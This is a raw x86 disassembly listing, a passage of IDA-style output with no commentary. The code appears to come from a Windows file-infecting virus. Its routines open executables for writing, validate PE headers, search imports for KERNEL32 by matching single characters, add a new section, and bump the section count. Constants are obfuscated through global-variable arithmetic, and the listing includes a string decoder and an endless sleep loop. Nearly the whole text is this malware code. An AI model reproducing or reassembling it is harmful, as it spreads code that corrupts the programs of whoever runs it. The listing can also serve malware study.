lea eax, [ebp+var_104]
push eax
mov eax, ds:10012104h
sub eax, 3
push eax
push 0
push [ebp+arg_0]
push 0
call dword ptr ds:1000EA44h
mov edi, eax
or edi, edi
jnz short loc_41C28A
push 100135F4h
call sub_4228CE
push eax
lea edi, [ebp+var_104]
push edi
call dword ptr ds:1000C020h
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_423CF4
add esp, 18h
loc_41C28A: ; CODE XREF: sub_41C232+2B�j
pop edi
leave
retn
sub_41C232 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C28D proc near ; CODE XREF: sub_41B7B4+3C�p
; sub_41B7B4+BC�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word ptr ds:10012154h
add eax, 0F8h
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, ds:1001213Ch
add eax, 0FAh
add eax, ds:100121CCh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, ds:10012098h
mov esi, eax
add esi, ds:100121A4h
sub esi, 7
jmp short loc_41C330
; ---------------------------------------------------------------------------
loc_41C2E0: ; CODE XREF: sub_41C28D+B6�j
mov edi, ds:100121A0h
add edi, ds:100120D4h
sub edi, 4
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_41C306
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_41C306: ; CODE XREF: sub_41C28D+72�j
mov ecx, ds:100121FCh
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, ds:10012104h
add edi, 36h
mov ecx, edi
add ecx, ds:1001210Ch
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_41C330: ; CODE XREF: sub_41C28D+51�j
mov eax, ds:10012118h
movsx edx, word ptr ds:100120D8h
add eax, edx
sub eax, 2
cmp esi, eax
jl short loc_41C2E0
pop edi
pop esi
pop ebx
leave
retn
sub_41C28D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C34A proc near ; CODE XREF: sub_41DCB0+B7�p
; sub_41DCB0+109�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41C360: ; CODE XREF: sub_41C34A+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C360
mov [ebp+var_4], eax
movsx eax, word ptr ds:100121BCh
mov edi, eax
add edi, ds:10012144h
sub edi, 0Bh
jmp short loc_41C3E8
; ---------------------------------------------------------------------------
loc_41C37E: ; CODE XREF: sub_41C34A+A1�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_41C391
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_41C391
cmp al, 2Eh
jnz short loc_41C3AA
loc_41C391: ; CODE XREF: sub_41C34A+3A�j
; sub_41C34A+41�j
movzx eax, byte ptr [esi+edi]
push eax
push 100135F1h
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10011634h
add esp, 0Ch
jmp short loc_41C3D9
; ---------------------------------------------------------------------------
loc_41C3AA: ; CODE XREF: sub_41C34A+45�j
push 100135ECh
call sub_4228CE
push eax
push ebx
call dword ptr ds:1000C020h
push 100135E4h
call sub_4228CE
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10011634h
add esp, 1Ch
loc_41C3D9: ; CODE XREF: sub_41C34A+5E�j
lea eax, [ebp+var_7]
push eax
push ebx
call dword ptr ds:1000C020h
add esp, 8
inc edi
loc_41C3E8: ; CODE XREF: sub_41C34A+32�j
cmp edi, [ebp+var_4]
jb short loc_41C37E
pop edi
pop esi
pop ebx
leave
retn
sub_41C34A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3F2 proc near ; CODE XREF: sub_41B1B9+24�p
; sub_41B58F+25�p ...
var_10D = byte ptr -10Dh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call dword ptr ds:1000E5FCh
movsx eax, word ptr ds:100120D8h
add eax, ds:10012178h
movsx edx, word ptr ds:10012170h
sub edx, 8
mov [ebp+eax+var_10D], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call dword ptr ds:10011614h
push 100135DCh
call sub_4228CE
push [ebp+var_10C]
push eax
push edi
call dword ptr ds:10011634h
add esp, 10h
movsx eax, word ptr ds:100120B0h
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_41C4BC
; ---------------------------------------------------------------------------
loc_41C48D: ; CODE XREF: sub_41C3F2+D8�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_41C4A3
cmp al, 39h
jg short loc_41C4A3
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_41C4A3: ; CODE XREF: sub_41C3F2+A3�j
; sub_41C3F2+A7�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_41C4B9
cmp al, 5Ah
jg short loc_41C4B9
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_41C4B9: ; CODE XREF: sub_41C3F2+B9�j
; sub_41C3F2+BD�j
inc [ebp+var_4]
loc_41C4BC: ; CODE XREF: sub_41C3F2+99�j
mov eax, ds:100120B8h
add eax, ds:100120A0h
cmp [ebp+var_4], eax
jb short loc_41C48D
pop edi
leave
retn
sub_41C3F2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 1001396Ch
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41C4FB
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C543
; ---------------------------------------------------------------------------
loc_41C4FB: ; CODE XREF: .data:0041C4E9�j
push 100138ECh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41C51B
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C543
; ---------------------------------------------------------------------------
loc_41C51B: ; CODE XREF: .data:0041C509�j
push 100138BCh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41C53B
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41C543
; ---------------------------------------------------------------------------
loc_41C53B: ; CODE XREF: .data:0041C529�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41C543: ; CODE XREF: .data:0041C4F9�j
; .data:0041C519�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 1000E604h
call dword ptr ds:1000EA3Ch
mov eax, ds:1000E604h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C561 proc near ; CODE XREF: sub_423996+147�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_424F4D
push ebx
push esi
push edi
mov eax, ds:10012184h
sub eax, 6
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_4223D9
add esp, 8
mov eax, ds:100120A4h
mov edi, eax
add edi, ds:100120E4h
sub edi, 4
jmp short loc_41C5BD
; ---------------------------------------------------------------------------
loc_41C59B: ; CODE XREF: sub_41C561+62�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_41C5BC
movsx eax, word ptr ds:10012090h
add eax, ds:100121A0h
sub eax, 7
mov [ebp+edi+var_FFF], al
loc_41C5BC: ; CODE XREF: sub_41C561+42�j
inc edi
loc_41C5BD: ; CODE XREF: sub_41C561+38�j
cmp edi, 0FFFh
jb short loc_41C59B
lea esi, [ebp+var_FFF]
loc_41C5CB: ; CODE XREF: sub_41C561+F7�j
push 100135D8h
call sub_4228CE
push 1000D020h
mov ebx, ds:100120F0h
add ebx, ds:100120C0h
sub ebx, 5
push ebx
mov ebx, ds:10012190h
sub ebx, 3
push ebx
push eax
movsx ebx, word ptr ds:100120DCh
add ebx, ds:100121C8h
sub ebx, 8
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, ds:100120B8h
sub ebx, 2
and ebx, 0FFh
push ebx
call sub_41DCB0
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41C629: ; CODE XREF: sub_41C561+CD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41C629
mov edx, ds:10012158h
movsx ecx, word ptr ds:100121BCh
add edx, ecx
sub edx, 5
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, ds:100121ACh
sub edx, 4
cmp eax, edx
jnz loc_41C5CB
pop edi
pop esi
pop ebx
leave
retn
sub_41C561 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41C666: ; CODE XREF: .data:0041C688�j
call sub_41F16E
mov eax, ds:10012190h
dec eax
mov edx, ds:1001210Ch
add edx, 0EA59h
imul eax, edx
push eax
call dword ptr ds:10011630h
pop ecx
jmp short loc_41C666
; ---------------------------------------------------------------------------
dw 0C25Dh
db 4, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C68E proc near ; CODE XREF: sub_4232A3+289�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_41C6A5
add eax, 3Fh
loc_41C6A5: ; CODE XREF: sub_41C68E+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_421484
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, ds:100120C4h
add edx, 3Ch
mov eax, edi
add eax, edx
jge short loc_41C6CC
add eax, 3Fh
loc_41C6CC: ; CODE XREF: sub_41C68E+39�j
sar eax, 6
mov edi, ds:100121C8h
add edi, 3Eh
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call dword ptr ds:1000C02Ch
push [ebp+arg_4]
push esi
push [ebp+var_14]
call dword ptr ds:10010634h
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_424643
mov esi, [ebp+var_14]
mov eax, ds:10012188h
movsx edx, word ptr ds:10012194h
mov ebx, eax
add ebx, edx
jmp short loc_41C734
; ---------------------------------------------------------------------------
loc_41C715: ; CODE XREF: sub_41C68E+C0�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_42466A
mov eax, ds:100120A8h
add eax, 37h
movsx edx, word ptr ds:10012180h
add eax, edx
lea esi, [esi+eax]
inc ebx
loc_41C734: ; CODE XREF: sub_41C68E+85�j
mov edi, [ebp+arg_4]
movsx edx, word ptr ds:100120BCh
lea eax, [edi+edx+37h]
test eax, eax
jge short loc_41C749
add eax, 3Fh
loc_41C749: ; CODE XREF: sub_41C68E+B6�j
sar eax, 6
cmp ebx, eax
jl short loc_41C715
push [ebp+var_14]
call sub_423972
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_41B3A8
mov eax, ds:100120E4h
add eax, 0Eh
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call dword ptr ds:10011648h
add esp, 18h
mov edi, ds:10012140h
sub edi, 8
cmp eax, edi
jz short loc_41C790
xor eax, eax
inc eax
jmp short loc_41C792
; ---------------------------------------------------------------------------
loc_41C790: ; CODE XREF: sub_41C68E+FB�j
xor eax, eax
loc_41C792: ; CODE XREF: sub_41C68E+100�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C68E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C797 proc near ; CODE XREF: sub_422E53+1B1�p
var_3200C = dword ptr -3200Ch
var_32008 = dword ptr -32008h
var_32004 = byte ptr -32004h
var_32003 = byte ptr -32003h
var_31FFD = byte ptr -31FFDh
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = dword ptr -31ED4h
var_31ED0 = byte ptr -31ED0h
var_31EC3 = byte ptr -31EC3h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3200Ch
call sub_424F4D
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC3]
push eax
call dword ptr ds:10010634h
add esp, 0Ch
push 0
push dword ptr ds:10012164h
push 3
push 0
mov eax, ds:100120A0h
sub eax, 4
push eax
push 0C0000001h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41C7F2
xor eax, eax
jmp loc_41DB4C
; ---------------------------------------------------------------------------
loc_41C7F2: ; CODE XREF: sub_41C797+52�j
push 0
push [ebp+var_1070]
call dword ptr ds:10011624h
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call dword ptr ds:1000EA34h
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:1000C028h
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31ED8]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_41DB35
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_41DB35
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
mov edx, ds:100120E4h
movsx ecx, word ptr ds:10012180h
add edx, ecx
sub edx, 7
cmp eax, edx
jz loc_41DB35
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
movsx ecx, word ptr ds:100120DCh
add ecx, 7
cmp edx, ecx
jnz short loc_41C8BC
mov edx, ds:10012158h
add edx, 8
mov [eax+1Ah], dl
cmp dl, 0
jnz loc_41DB35
loc_41C8BC: ; CODE XREF: sub_41C797+10E�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EE8], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF0], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EEC], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF4], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31EFC], edx
mov eax, [ebp+var_31EE8]
mov [ebp+var_31EF8], eax
mov ecx, ds:100120ACh
inc ecx
add ecx, ds:10012108h
mul ecx
mov [ebp+var_31F00], eax
mov eax, [ebp+var_31EFC]
mov edx, [ebp+var_31F00]
add eax, edx
mov edx, [ebp+var_31EF0]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_41DB35
mov eax, ds:100121C4h
sub eax, 5
mov [ebp+var_20], eax
movsx eax, word ptr ds:10012170h
add eax, ds:10012144h
sub eax, 0Dh
mov [ebp+var_C54], eax
movsx eax, word ptr ds:100120E0h
add eax, ds:100121B4h
dec eax
mov [ebp+var_105C], eax
movsx eax, word ptr ds:10012170h
sub eax, 8
mov [ebp+var_434], eax
jmp loc_41CA57
; ---------------------------------------------------------------------------
loc_41C995: ; CODE XREF: sub_41C797+2CD�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F0C]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F04], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F08], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F04], eax
jbe short loc_41C9EC
mov eax, [ebp+var_31F04]
mov [ebp+var_20], eax
loc_41C9EC: ; CODE XREF: sub_41C797+24A�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F08], eax
jbe short loc_41CA06
mov eax, [ebp+var_31F08]
mov [ebp+var_C54], eax
loc_41CA06: ; CODE XREF: sub_41C797+261�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_41CA31
cmp eax, [ebp+var_31F04]
jnb short loc_41CA31
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_41CA31: ; CODE XREF: sub_41C797+27B�j
; sub_41C797+283�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_41CA51
add edx, [esi+8]
cmp eax, edx
jnb short loc_41CA51
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_848], eax
loc_41CA51: ; CODE XREF: sub_41C797+2A5�j
; sub_41C797+2AC�j
inc [ebp+var_434]
loc_41CA57: ; CODE XREF: sub_41C797+1F9�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_41C995
mov eax, ds:100120A8h
add eax, 0FFDh
push eax
push [ebp+var_20]
call sub_41E1DA
add esp, 8
mov [ebp+var_20], eax
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_41CAA6
mov eax, [ebp+var_8]
mov edx, ds:100121C0h
sub edx, 3
cmp [eax+0A8h], edx
jz loc_41DB35
loc_41CAA6: ; CODE XREF: sub_41C797+2F5�j
mov eax, ds:100120B4h
add eax, ds:100120A0h
sub eax, 0Ch
cmp [ebp+var_105C], eax
jz loc_41CB85
mov eax, ds:100121A0h
sub eax, 6
mov [ebp+var_31F0C], eax
mov eax, ds:10012134h
sub eax, 3
mov [ebp+var_31F04], eax
jmp short loc_41CB2C
; ---------------------------------------------------------------------------
loc_41CADE: ; CODE XREF: sub_41C797+3BB�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F10], eax
mov eax, 1Ch
mul [ebp+var_31F04]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_31F10]
mov edx, [ebp+var_31F14]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F08], eax
mov edx, [ebp+var_31F0C]
cmp [eax+18h], edx
jbe short loc_41CB26
mov eax, [eax+18h]
mov [ebp+var_31F0C], eax
loc_41CB26: ; CODE XREF: sub_41C797+384�j
inc [ebp+var_31F04]
loc_41CB2C: ; CODE XREF: sub_41C797+345�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F10], edx
mov edi, edx
cmp [ebp+var_31F04], edi
jb short loc_41CADE
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F0C]
call sub_41E1DA
add esp, 8
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_41CB85
cmp [ebp+var_31F0C], eax
jnz loc_41DB35
loc_41CB85: ; CODE XREF: sub_41C797+323�j
; sub_41C797+3E0�j
and [ebp+var_1174], 0
mov eax, ds:100121CCh
movsx edx, word ptr ds:100120DCh
add eax, edx
sub eax, 0Ah
mov [ebp+var_438], eax
jmp loc_41CCE2
; ---------------------------------------------------------------------------
loc_41CBA8: ; CODE XREF: sub_41C797+55A�j
mov eax, [ebp+var_848]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32008], eax
mov edx, ds:100120D4h
dec edx
cmp [eax], edx
jz loc_41CCF7
mov eax, [ebp+var_32008]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_848]
mov [ebp+var_3200C], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32003]
push eax
call dword ptr ds:1000E1F4h
add esp, 8
movsx eax, word ptr ds:10012100h
movsx edx, word ptr ds:10012128h
add eax, edx
sub eax, 9
mov [ebp+var_31F04], eax
jmp short loc_41CC41
; ---------------------------------------------------------------------------
loc_41CC16: ; CODE XREF: sub_41C797+4C9�j
mov eax, [ebp+var_31F04]
mov al, [ebp+eax+var_32003]
cmp al, 61h
jle short loc_41CC3B
cmp al, 7Ah
jge short loc_41CC3B
mov eax, [ebp+var_31F04]
lea eax, [ebp+eax+var_32003]
sub byte ptr [eax], 20h
loc_41CC3B: ; CODE XREF: sub_41C797+48E�j
; sub_41C797+492�j
inc [ebp+var_31F04]
loc_41CC41: ; CODE XREF: sub_41C797+47D�j
mov eax, [ebp+var_31F04]
movsx eax, [ebp+eax+var_32003]
mov edx, ds:1001213Ch
add edx, ds:10012098h
sub edx, 9
cmp eax, edx
jnz short loc_41CC16
mov eax, ds:100121B4h
cmp [ebp+eax+var_32004], 4Bh
jnz short loc_41CCDB
movsx eax, word ptr ds:100120DCh
cmp byte ptr [ebp+eax+var_32008], 45h
jnz short loc_41CCDB
mov eax, ds:100120ECh
add eax, ds:10012164h
cmp byte ptr [ebp+eax+var_32008+2], 52h
jnz short loc_41CCDB
movsx eax, word ptr ds:10012170h
movsx edx, word ptr ds:10012180h
add eax, edx
cmp byte ptr [ebp+eax+var_3200C], 4Ch
jnz short loc_41CCDB
movsx eax, word ptr ds:10012154h
cmp byte ptr [ebp+eax+var_32008+3], 33h
jnz short loc_41CCDB
mov eax, ds:10012118h
cmp [ebp+eax+var_31FFD], 32h
jnz short loc_41CCDB
mov [ebp+var_1174], 1
loc_41CCDB: ; CODE XREF: sub_41C797+4D8�j
; sub_41C797+4E9�j ...
add [ebp+var_438], 14h
loc_41CCE2: ; CODE XREF: sub_41C797+40C�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_41CBA8
loc_41CCF7: ; CODE XREF: sub_41C797+42F�j
cmp [ebp+var_1174], 0
jz loc_41DB35
lea eax, [ebp+var_31EC3]
mov [ebp+var_42C], eax
mov ecx, [eax+3Ch]
mov [ebp+var_84C], ecx
add ecx, eax
mov [ebp+var_844], ecx
mov eax, [ebp+var_8]
mov [ebp+var_31F04], eax
movsx edx, word ptr ds:100121BCh
sub edx, 6
cmp [eax+0D0h], edx
jz loc_41CEB1
mov edx, [eax+0D4h]
mov [ebp+var_31F08], edx
movsx ecx, word ptr ds:100120D0h
cmp edx, ecx
jz loc_41CEB1
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F04]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F0C], edx
mul edx
mov [ebp+var_31F10], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F18], edx
mov eax, ecx
mov [ebp+var_31F14], eax
mov ecx, ds:10012108h
add ecx, 4
mul ecx
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
mov edx, [ebp+var_31F1C]
add eax, edx
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31F04]
cmp [edx+54h], eax
jbe loc_41CEB1
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F28], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_31F28]
mov edx, [ebp+var_31F2C]
add eax, edx
mov [ebp+var_31F20], eax
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
movsx edi, word ptr ds:100120BCh
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F20]
add edx, eax
push edx
mov edx, [ebp+var_31F24]
add edx, eax
push edx
call dword ptr ds:10010634h
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
mov edi, ds:10012130h
add edi, ds:10012144h
sub edi, 3
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, eax
mov ecx, [ebp+var_31F3C]
add [edx], ecx
loc_41CEB1: ; CODE XREF: sub_41C797+5A3�j
; sub_41C797+5BE�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41E1DA
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F20]
mov esi, edx
add esi, eax
push 100135CFh
call sub_4228CE
push eax
push esi
call dword ptr ds:1000E1F4h
mov eax, ds:100120ACh
add eax, 1FFFDh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_41E1DA
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, ds:10012104h
add eax, 0C0000034h
movsx edx, word ptr ds:10012100h
add eax, edx
mov [esi+24h], eax
mov eax, ds:10012164h
add eax, 6
movsx edx, word ptr ds:10012180h
add eax, edx
push eax
mov eax, ds:10012098h
add eax, ds:1001209Ch
sub eax, 0Fh
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10010640h
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_41E1DA
add esp, 30h
mov [ebp+var_10], eax
mov eax, ds:100120ECh
add eax, 1FFFAh
add eax, ds:10012118h
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
